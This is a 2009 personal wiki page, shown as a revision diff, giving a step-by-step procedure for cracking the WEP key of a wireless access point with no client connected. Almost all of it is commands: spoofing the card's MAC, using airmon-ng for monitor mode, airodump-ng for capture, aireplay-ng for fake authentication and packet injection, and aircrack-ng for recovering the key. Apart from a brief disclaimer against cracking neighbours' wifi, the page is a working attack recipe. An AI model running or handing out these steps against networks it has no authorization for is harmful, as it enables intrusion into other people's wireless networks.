Cracking a clientless wep AP: Difference between revisions

From D3xt3r01.tk
Jump to navigationJump to search
New page: ==WHY== Not all AP's have a client connected ...I'll assume you already have a supported card and the injection is working !!! I'll also assume that you know what you're doing and you're ...
 
Line 9: Line 9:
   ifconfig wlan0 down
   ifconfig wlan0 down
2) change card mac
2) change card mac
   ifconfig wlan0 hw ether 00:11:22:33:44:55
   ifconfig wlan0 hw ether 00:11:22:33:44:55 up
3) start it in monitor mode
3) get some access points
  iwlist wlan0 scan
4) start it in monitor mode
   airmon-ng start wlan0
   airmon-ng start wlan0
4) start dumping packets
5) start dumping packets
   airodump-ng -c channel -w file --bssid ap_mac wlan0
   airodump-ng -c channel -w file --bssid ap_mac wlan0
5) fake auth
6) fake auth
   aireplay-ng -1 0 -a ap_mac -h 00:11:22:33:44:55 wlan0
   aireplay-ng -1 0 -a ap_mac -h 00:11:22:33:44:55 wlan0
6) play some fake packets ( you should see the packets grow fast in the airodump-ng window )
7) play some fake packets ( you should see the packets grow fast in the airodump-ng window )
   aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b ap_mac -h 00:11:22:33:44:55 wlan0
   aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b ap_mac -h 00:11:22:33:44:55 wlan0
7) crack it !!!
8) crack it !!!
   aircrack-ng file-01.cap
   aircrack-ng file-01.cap



Revision as of 17:28, 28 July 2009

WHY

Not all AP's have a client connected ...I'll assume you already have a supported card and the injection is working !!! I'll also assume that you know what you're doing and you're not doing anything illegal ! DON'T GO CRACKING NEIGHBOURs wifi...

HOW

1) stop the card

 airmon-ng stop wlan0
 ifconfig wlan0 down

2) change card mac

 ifconfig wlan0 hw ether 00:11:22:33:44:55 up

3) get some access points

 iwlist wlan0 scan

4) start it in monitor mode

 airmon-ng start wlan0

5) start dumping packets

 airodump-ng -c channel -w file --bssid ap_mac wlan0

6) fake auth

 aireplay-ng -1 0 -a ap_mac -h 00:11:22:33:44:55 wlan0

7) play some fake packets ( you should see the packets grow fast in the airodump-ng window )

 aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b ap_mac -h 00:11:22:33:44:55 wlan0

8) crack it !!!

 aircrack-ng file-01.cap

STUFF

If something's wrong .. you're probably not auth'ed .. or the injection doesn't work .. or you're too far away .. bla bla bla